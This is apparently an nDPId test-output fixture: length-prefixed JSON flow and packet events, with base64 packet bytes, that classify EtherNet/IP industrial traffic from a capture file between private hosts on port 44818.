00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1352718180263,"pkt":"AAC80WDaeOfR4AJeCABFAAB6cCZAAIAGAACNUQAKjVEAU8RjrxLdiI2HlJVDUVAY+XQbbAAAcAA6AAABAhAAAAAAGjkvAAAAAAAAAAAAAAAAAAoAAgChAAQACRM1ALEAJgDkagoCIAIkAQIABgASAEwCIHIkAADOBAABAEwCIHIkACw9BAABAA=="}
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1352718180264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1352718180264,"pkt":"eOfR4AJeAAC80WDaCABFAAAowW9AAEAGXmGNUQBTjVEACq8SxGOUlUNR3YiN2VAQD8bOTwAAAAAAAI1R"}
02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1352718180264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1258,"pkt_l4_len":1224,"thread_ts_msec":1352718180264,"pkt":"AAC80WDaeOfR4AJeCABFAATccChAAIAGAACNUQAKjVEAU8RjrxLdiI3ZlJVDUVAY+XQfzgAAcAAsAAABAhAAAAAAGzkvAAAAAAAAAAAAAAAAAAoAAgChAAQAChU1ALEAGACvuAoCIAIkAQEABABMAiByJAAEggYAAQBwADoAAAECEAAAAAAcOS8AAAAAAAAAAAAAAAAACgACAKEABAAFCzUAsQAmAHuyCgIgAiQBAgAGABIATAIgciQAGLcEAAEATAIgciQAvFQGAAEAcAAsAAABAhAAAAAAHTkvAAAAAAAAAAAAAAAAAAoAAgChAAQABg01ALEAGAAHpAoCIAIkAQEABABMAiByJAAEggYAAQBwAKoAAAECEAAAAAAeOS8AAAAAAAAAAAAAAAAACgACAKEABAABAzUAsQCWABkzCgIgAiQBCgAWACIALgA6AEYAUgBeAGoAdgCCAEwCIHIkAHR\/BwABAEwCIHIkANiMBAABAEwCIHIkAITEBAABAEwCIHIkAAznBQABAEwCIHIkABh0BwABAEwCIHIkADS+BgABAEwCIHIkABDjBAABAEwCIHIkADQ\/BgABAEwCIHIkADS8BQABAEwCIHIkADTGBgABAHAA4gAAAQIQAAAAAB85LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAIFNQCxAM4AoxkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABAoQYAAQBMAiByJADc\/QUAAQBMAiByJAD0hgUABgBMAiByJAAs5QUAAQBMAiByJACYFAcAAQBMAiByJACkkwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJABQpQUAAQBMAiByJABY4wQAAQBMAiByJAC4xwcAAwBMAiByJAC0zwQAAQBwACwAAAECEAAAAAAgOS8AAAAAAAAAAAAAAAAACgACAKEABAADBzUAsQAYAHenCgIgAiQBAQAEAEwCIHIkAGiiBwAJAHAAwgEAAQIQAAAAACE5LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAQJNQCxAK4Bf58KAiACJAEeAD4ASgBWAGIAbgB6AIYAkgCeAKoAtgDCAM4A2gDmAPIA\/gAKARYBIgEuAToBRgFSAV4BagF2AYIBjgGaAUwCIHIkAIx0BwABAEwCIHIkAKiiBwABAEwCIHIkAJg0BAABAEwCIHIkADgxBwABAEwCIHIkAChvBgABAEwCIHIkACiNBgABAEwCIHIkAAgQBgABAEwCIHIkANRpBwABAEwCIHIkAEB1BgABAEwCIHIkAPQcBgABAEwCIHIkAOwZBgABAEwCIHIkAIizBwABAEwCIHIkAOQgBgABAEwCIHIkAMgaBgABAEwCIHIkAGQ5BwABAEwCIHIkADi\/BgABAEwCIHIkACivBQABAEwCIHIkABwhBgABAEwCIHIkAEj1BQABAEwCIHIkAFT1BgABAEwCIHIkAAA8BgABAEwCIHIkAMRfBwABAEwCIHIkALCqBQABAEwCIHIkAKC1BgABAEwCIHIkAMT8BwABAEwCIHIkAMB0BgABAEwCIHIkAEzoBwABAEwCIHIkAGguBAABAEwCIHIkAHyvBQABAEwCIHIkALwJBgABAA=="}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180265,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1RAAEAGjEiNUQA\/jVEACq8SzXF9dCfmE+ef0VAYEACJaQAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAncYAgLEAHAAzNYoAAAACAAYADgDMAAAAAQAAAMwAAAAFAAAA"}
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1352718180265,"pkt":"AAC8x85WeOfR4AJeCABFAAF0cCpAAIAGAACNUQAKjVEAP81xrxIT55\/RfXQoLlAY9kIcUgAAcAA6AAAFAhMAAAAAZsC+AAAAAAAAAAAAAAAAAAoAAgChAAQABy8uALEAJgDoRwoCIAIkAQIABgASAEwCIHIkABi3BAABAEwCIHIkADxUBgABAHAA4gAABQITAAAAAGfAvgAAAAAAAAAAAAAAAAAKAAIAoQAEAAMnLgCxAM4AUkkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABEoQYAAQBMAiByJABc\/QUAAQBMAiByJAB0hgUABgBMAiByJACs5AUAAQBMAiByJACcFAcAAQBMAiByJACokwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJADQpAUAAQBMAiByJABY4wQAAQBMAiByJAC8xwcAAwBMAiByJAC0zwQAAQA="}
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1352718180276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180276,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1ZAAEAGjEaNUQA\/jVEACq8SzXF9dCguE+ehHVAYEADbwgAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAlcYAgLEAHADoR4oAAAACAAYADgDMAAAAAAAAAMwAAAAFAAAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180390,"pkt":"AAC8X0j6eOfR4AJeCABFAADqcEVAAIAGAACNUQAKjVEAK81yrxIurdArV0tI1VAY+M4btAAAcACqAAAEAhAAAAAAVgG6AAAAAAAAAAAAAAAAAAoAAgChAAQAASuWALEAlgBI5QoCIAIkAQoAFgAiAC4AOgBGAFIAXgBqAHYAggBMAiByJABI8gcAAQBMAiByJAAY8QQAAQBMAiByJABUPgUAAQBMAiByJAB42QcAAQBMAiByJAC8YQYAAQBMAiByJAAgzgQAAQBMAiByJAC8LgUAAQBMAiByJACcBgQAAQBMAiByJACwAQYAAQBMAiByJAD8DwQAAQA="}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1352718180392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1352718180392,"pkt":"eOfR4AJeAAC8X0j6CABFAADAqJJAAEAGds6NUQArjVEACq8SzXJXS0jVLq3Q7VAYEAA2UAAAcACAAAAEAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQApcYAgLEAbABI5YoAAAAKABYAHgAmAC4ANgA+AEYATgBWAF4AzAAAAGC0GD\/MAAAAM1O1QswAAAC1P4xBzAAAAAAAAADMAAAAYLQYP8wAAAAAAKBAzAAAAAAAAEDMAAAAAAAAAMwAAAAAAAAAzAAAAAAAAAA="}
01087{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1352718180392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1352718180392,"pkt":"AAC8X0j6eOfR4AJeCABFAAICcEdAAIAGAACNUQAKjVEAK81yrxIurdDtV0tJbVAY+DYczAAAcADCAQAEAhAAAAAAVwG6AAAAAAAAAAAAAAAAAAoAAgChAAQAAi2WALEArgFJUwoCIAIkAR4APgBKAFYAYgBuAHoAhgCSAJ4AqgC2AMIAzgDaAOYA8gD+AAoBFgEiAS4BOgFGAVIBXgFqAXYBggGOAZoBTAIgciQALBwHAAEATAIgciQA0BsGAAEATAIgciQAsBQHAAEATAIgciQA3PMHAAEATAIgciQAnDYFAAEATAIgciQAvAcHAAEATAIgciQAkNEFAAEATAIgciQAAH8HAAEATAIgciQATCMGAAEATAIgciQAOEkGAAEATAIgciQALIcEAAEATAIgciQAALQFAAEATAIgciQAqHwFAAEATAIgciQATJYHAAEATAIgciQAaBgHAAEATAIgciQA3PsGAAEATAIgciQATLwGAAEATAIgciQAGB0IAAEATAIgciQAcFMHAAEATAIgciQAvIMFAAEATAIgciQAvBkGAAEATAIgciQAOJQFAAEATAIgciQATLEFAAEATAIgciQA9HoGAAEATAIgciQApPIGAAEATAIgciQAFIEEAAEATAIgciQA2PAEAAEATAIgciQA+FMGAAEATAIgciQA2PUGAAEATAIgciQApF8HAAEA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180397,"pkt":"AAC8X0lReOfR4AJeCABFAADqcEpAAIAGAACNUQAKjVEAF\/T9rxIm2H0TxmFi41AY9W4boAAAcACqAAABAhAAAAAAo6iTAAAAAAAAAAAAAAAAAAoAAgChAAQAAQOLALEAlgBx7AoCIAIkAQQACgAoAEYAagBODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMQEAAf9ODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMgEAAf9OD5EbTE1TX0RJU0FCTEVfQkFSQ09ERV9TQ0FOTkVSAAEAAP5OD5EbTE1TX1NFVFBPSU5UQ0hBTkdFX1JFQ0VJVkVEAAEAAP4="}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1352718180400,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1352718180400,"pkt":"eOfR4AJeAAC8X0lRCABFAAB0TSZAAEAG0pqNUQAXjVEACq8S9P3GYWLjJth91VAYEADGbgAAcAA0AAABAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAtccAgLEAIABx7IoAAAAEAAoADgASABYAzgAAAM4AAADOAAAAzgAAAA=="}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1352718180599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1352718180599,"pkt":"AAC8X0lReOfR4AJeCABFAAAocJ5AAIAGAACNUQAKjVEAF\/T9rxIm2H3VxmFjL1AQ+vAa3gAA"}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7560000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1352718180263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1352718180263,"pkt":"AAC80WDaeOfR4AJeCABFAAB6cCZAAIAGAACNUQAKjVEAU8RjrxLdiI2HlJVDUVAY+XQbbAAAcAA6AAABAhAAAAAAGjkvAAAAAAAAAAAAAAAAAAoAAgChAAQACRM1ALEAJgDkagoCIAIkAQIABgASAEwCIHIkAADOBAABAEwCIHIkACw9BAABAA=="}
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7560000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1352718180264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1352718180264,"pkt":"eOfR4AJeAAC80WDaCABFAAAowW9AAEAGXmGNUQBTjVEACq8SxGOUlUNR3YiN2VAQD8bOTwAAAAAAAI1R"}
02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1352718180264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1258,"pkt_l4_len":1224,"thread_ts_msec":1352718180264,"pkt":"AAC80WDaeOfR4AJeCABFAATccChAAIAGAACNUQAKjVEAU8RjrxLdiI3ZlJVDUVAY+XQfzgAAcAAsAAABAhAAAAAAGzkvAAAAAAAAAAAAAAAAAAoAAgChAAQAChU1ALEAGACvuAoCIAIkAQEABABMAiByJAAEggYAAQBwADoAAAECEAAAAAAcOS8AAAAAAAAAAAAAAAAACgACAKEABAAFCzUAsQAmAHuyCgIgAiQBAgAGABIATAIgciQAGLcEAAEATAIgciQAvFQGAAEAcAAsAAABAhAAAAAAHTkvAAAAAAAAAAAAAAAAAAoAAgChAAQABg01ALEAGAAHpAoCIAIkAQEABABMAiByJAAEggYAAQBwAKoAAAECEAAAAAAeOS8AAAAAAAAAAAAAAAAACgACAKEABAABAzUAsQCWABkzCgIgAiQBCgAWACIALgA6AEYAUgBeAGoAdgCCAEwCIHIkAHR\/BwABAEwCIHIkANiMBAABAEwCIHIkAITEBAABAEwCIHIkAAznBQABAEwCIHIkABh0BwABAEwCIHIkADS+BgABAEwCIHIkABDjBAABAEwCIHIkADQ\/BgABAEwCIHIkADS8BQABAEwCIHIkADTGBgABAHAA4gAAAQIQAAAAAB85LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAIFNQCxAM4AoxkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABAoQYAAQBMAiByJADc\/QUAAQBMAiByJAD0hgUABgBMAiByJAAs5QUAAQBMAiByJACYFAcAAQBMAiByJACkkwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJABQpQUAAQBMAiByJABY4wQAAQBMAiByJAC4xwcAAwBMAiByJAC0zwQAAQBwACwAAAECEAAAAAAgOS8AAAAAAAAAAAAAAAAACgACAKEABAADBzUAsQAYAHenCgIgAiQBAQAEAEwCIHIkAGiiBwAJAHAAwgEAAQIQAAAAACE5LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAQJNQCxAK4Bf58KAiACJAEeAD4ASgBWAGIAbgB6AIYAkgCeAKoAtgDCAM4A2gDmAPIA\/gAKARYBIgEuAToBRgFSAV4BagF2AYIBjgGaAUwCIHIkAIx0BwABAEwCIHIkAKiiBwABAEwCIHIkAJg0BAABAEwCIHIkADgxBwABAEwCIHIkAChvBgABAEwCIHIkACiNBgABAEwCIHIkAAgQBgABAEwCIHIkANRpBwABAEwCIHIkAEB1BgABAEwCIHIkAPQcBgABAEwCIHIkAOwZBgABAEwCIHIkAIizBwABAEwCIHIkAOQgBgABAEwCIHIkAMgaBgABAEwCIHIkAGQ5BwABAEwCIHIkADi\/BgABAEwCIHIkACivBQABAEwCIHIkABwhBgABAEwCIHIkAEj1BQABAEwCIHIkAFT1BgABAEwCIHIkAAA8BgABAEwCIHIkAMRfBwABAEwCIHIkALCqBQABAEwCIHIkAKC1BgABAEwCIHIkAMT8BwABAEwCIHIkAMB0BgABAEwCIHIkAEzoBwABAEwCIHIkAGguBAABAEwCIHIkAHyvBQABAEwCIHIkALwJBgABAA=="}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180265,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1RAAEAGjEiNUQA\/jVEACq8SzXF9dCfmE+ef0VAYEACJaQAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAncYAgLEAHAAzNYoAAAACAAYADgDMAAAAAQAAAMwAAAAFAAAA"}
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
